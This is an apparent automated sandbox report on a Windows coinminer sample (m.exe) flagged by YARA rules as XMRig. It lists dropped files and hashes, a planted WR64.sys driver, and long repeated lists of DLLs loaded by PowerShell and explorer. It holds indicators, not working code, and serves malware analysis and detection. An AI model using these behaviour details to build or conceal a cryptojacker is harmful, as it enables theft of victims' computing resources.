Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware | Author: ditekSHen
Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner | Author: Florian Roth
Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware | Author: ditekSHen
Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner | Author: Florian Roth
Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware | Author: ditekSHen
Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner | Author: Florian Roth
Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware | Author: ditekSHen
Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner | Author: Florian Roth
Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware | Author: ditekSHen
Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner | Author: Florian Roth
Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware | Author: ditekSHen
Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: Process Memory Space: m.exe PID: 2724, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPED | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 | Author: unknown
Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPED | Matched rule: Detects Monero Crypto Coin Miner | Author: Florian Roth
Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPED | Matched rule: Detects coinmining malware | Author: ditekSHen
Source: C:\Windows\System32\conhost.exe | Code function: 10_2_00007FF6B2973F40 NtCreateUserProcess
Source: C:\Program Files\MINA\m.exe | File created: C:\Program Files\Google\Libs\WR64.sys
Source: C:\Program Files\MINA\m.exe | File deleted: C:\Windows\Temp\wbiwcikhpmwr.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F352FA
Source: C:\Windows\System32\conhost.exe | Code function: 10_2_00007FF6B29885D0
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B29771A010_2_00007FF6B29771A0
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B2983DF010_2_00007FF6B2983DF0
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B2986D9010_2_00007FF6B2986D90
                Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\wbiwcikhpmwr.tmp 78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF6B2973F40 appears 34 times
                Source: m.exe.0.drStatic PE information: Number of sections : 11 > 10
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic PE information: Number of sections : 11 > 10
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
